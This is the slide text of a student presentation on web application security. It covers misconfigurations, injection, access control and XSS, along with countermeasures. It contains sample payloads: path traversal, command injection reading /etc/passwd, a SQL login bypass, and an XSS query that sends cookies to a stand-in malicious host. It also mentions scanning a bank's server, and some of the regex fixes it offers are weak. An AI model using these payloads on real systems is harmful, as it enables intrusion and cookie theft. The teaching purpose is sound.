20061003 Grice Presentation

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Web Application Security Web Application Security Greg Rice & Sean Howard Iowa State University Information Assurance Student Group

 Web App Security != Network Security 

 Lucrative to attackers 

 HTTP Server Software (Apache, IIS, embedded)

 Web Applications (Perl, PHP, Java, Javascript, C#)

 Browsers (Mozilla, Internet Explorer, Safari)

 Web Technologies and Services (HTTP, XML, SSL, SQL, RSS, cookies AJAX)

 Server Operating System

Online business accounts, customer data accessible via a web browser – little chance of detection

 Penetration testers report high success rates 

Points of Exposure

Firewalls, encryption, antivirus, etc. have no effect on web interface

“Sure it is possible to write secure CGI scripts, but hardly anyone does. One company that audits web sites for application-level bugs like this has never found a web site they could not hack. That's 100 percent vulnerabilities.” – Schneier

Vulnerability: Buffer Overflows  Exploits regularly published for web servers and associated modules  Can be used to execute arbitrary code  Modern web applications written in C++/C# or those utilizing dynamic libraries also vulnerable to attack  Rarely uncovered, no reported incidents

(Linux, Windows)

Pen Test: Buffer Overflows

Buffer Overflow Attacks

 Determine OS, Server, and Web Apps  nmap – Are other ports open?  amap – Application fingerprints  Scan for well known overflow exploits  nikto – web vulnerability scanner  wikto – windows nikto with spider\mirror  nessus

 Server Countermeasure:  Regularly apply all patches (including mods!)  chroot jails \ privilege separation  Stack protection  Web App Countermeasures  Be suspicious of all string input!  Consider Java over C variants


Vulnerability: Misconfigurations  Server, modules, and installed apps all have default and often insecure settings  Well-known accounts and passwords  Unnecessary sample applications\libraries  Debug\error messages  Remote administrative consoles  Unused SSL certificates  Support for extraneous HTTP methods  Web accessible system files

Pen Test: Misconfigurations  nikto\wikto scanner  Determines server software and scans for common misconfigurations

 Finds potentially dangerous PHP, ASP, and CGI    

apps Enumerates supported HTTP methods Username guessing Periodically updated wikto integrates Google spidering

Countermeasures nikto Demonstration Scan a Local Bank’s Web Server

 Enable a hardened or paranoid configuration over the default  Ex. Replace php.ini with php.ini-paranoid  Turn off server signatures  Ex. In httpd.conf: ServerSignature Off ServerTokens production

 Remove all unused web scripts!  Disable all remote administration

Vulnerability: Error Handling  In the event of an error, web apps and scripts provide unnecessary information  Examples: out-of-memory, invalid login, unable to find file, database connection

 Attackers use errors to identify  Internal IP addresses  System configurations  Application versions  System paths  Database connectivity

Countermeasures  Log all errors to private data file on web server or syslog server – and review!  IIS 6 error ASP.NET error reporting limited by default  Example: php.ini syslog errors display_errors = Off log_errors = On error_log = syslog ignore_repeated_errors = On


Vulnerability: Access Control

Pen Test: Access Control

 Web apps often require authentication, but fail to implement it correctly  Ex. Webmail interface, external wikis  Extremely difficult to implement correctly

 Password Cracking Tools

in custom web apps\scripts




 Basic HTTP authentication often allows repeated password guessing


Allows for dictionary and bruteforce password attacks via HTTP(S) auth HTML Form\CGI cracker Command line HTTP(S) pocket knife


Checks for common and default passwords

 Search for web accessible password and other protected files  

Site spidering and mirroring Google hacking

 View the HTML source comments


Custom Developed Application Code APPLICATION ATTACK

Web Services

Custom Web Scripts Full of Holes but often Trusted by Protected Systems Outside the DMZ Perimeter

Legacy Systems

Cracking Demonstration

Application Layer

Web Application Exposure

Web Server Hardened OS Firewall


Network Layer

WebGoat Tutorial?

[Image Src: OWASP.org]

Vulnerability: Input Validation

Injection CGI Example

 Client determines data to pass in HTTP requests to server  Ex. Query strings, form fields, hidden

CGI\Perl Code:

fields  Scripts interpret input to generate response

 Programmers too often trust the web input – fail to inspect and sanitize request

# Get username from form input # and return contents over web $filename="/safe/dir/to/read/$USER" open(FILE, $filename)

Attacker Form Input: ../../../../../../etc/passwd Solution – Validate the Input: $USER=~s/\.\.\///g;


Vulnerability: Command Injection  Epitomizes importance of input validation  Web app passes input to secondary interpreter  OS call, SQL database, image processor, etc

 Attackers pass malicious command payload in the request to execute with server privileges

Command Injection Example CGI\Perl Code: # Get address to email form input # and return contents over web

$temp = $CGI{'email'}; $MAILER = "/usr/sbin/sendmail -t –f $temp" open(MAIL,"| $MAILER") || &ERROR('Error');

Attacker Form Input: [email protected]; cat /etc/passwd Solution – Validate the Input: $temp=~s/\;//g;

ASP/SQL Command Injection

Pen Testing: Input Validation

ASP Code:

 WebScarab\Paros  Platform Independent HTTP Proxy  Intercepts and allows to user to modify all

# Check username and password var sql = "SELECT * FROM users

WHERE login = '" + formusr + "' AND password = '" + formpwd + "'"; Attacker Form Input: formusr = ' or 1=1; – – formpwd = anything Resulting Query: SELECT * FROM usersWHERE username = '' or 1=1; -- AND password = ‘anything’

HTTP requests and responses  Ability to modify field data after client-side input validation

 WebScarab fuzzes for common SQL injection errors

Countermeasures Demonstration Using WebScarab to Modify Hidden Form Fields

 Audit web application source - sanitize all input!  Client-side validation is irrelevant!  Reject anything not typical!  Unless required, disallow all access to interpreters  Example: php.ini config disable_functions = dl, system, mail

 Use limited interfaces when possible


Vulnerability: Cross-Site Scripting

XSS Attack Samples

 Recall web browsers execute client-side

 Normal URL Query:

Javascript, Flash  Reflected XSS Attack: user input data is appears in dynamic web content without HTML encoding, allows client-side code to be injected into the dynamic page  Stored XSS Attack: malicious input data is stored on the web server and appears for all other users viewing page


 XSS Attack Query: http://www.host.com/query.php?var=‘’> <script>document.location=‘ http://www.malicioussite.com/cgi-bin /cookietheft.cgi?'%20+document.cookie

Pen Testing: XSS Attacks  WebScarab\Paros  Identify if header, cookie, query string, form field, or hidden field data appears in any dynmaic content without HTML encoding  WebScarab fuzzes for common XSS injection errors

Countermeasures  Avoid opening remote files when possible  Example: php.ini config allow_url_fopen = Off

 Define allowable input strings and inspect any user-supplied data – COMPLEX!  HTML encode output

XSS Attack Demo WebGoat?

Future of Web Security  Embedded web server attacks  AJAX exploits  Increase in attack surface  Client-side attacks, autonomous XSS  Ex. MySpace.com Attack

 Allows repudiation\forgery of requests  Injection through bridging  Hype means a rush to implement


Best Practices  Maintain server and commercial web apps with any patches  Never trust user input – even when client-side validation enabled  Disable any additional unneeded services or apps  Learn more – WebGoat, OWASP  Assess and audit


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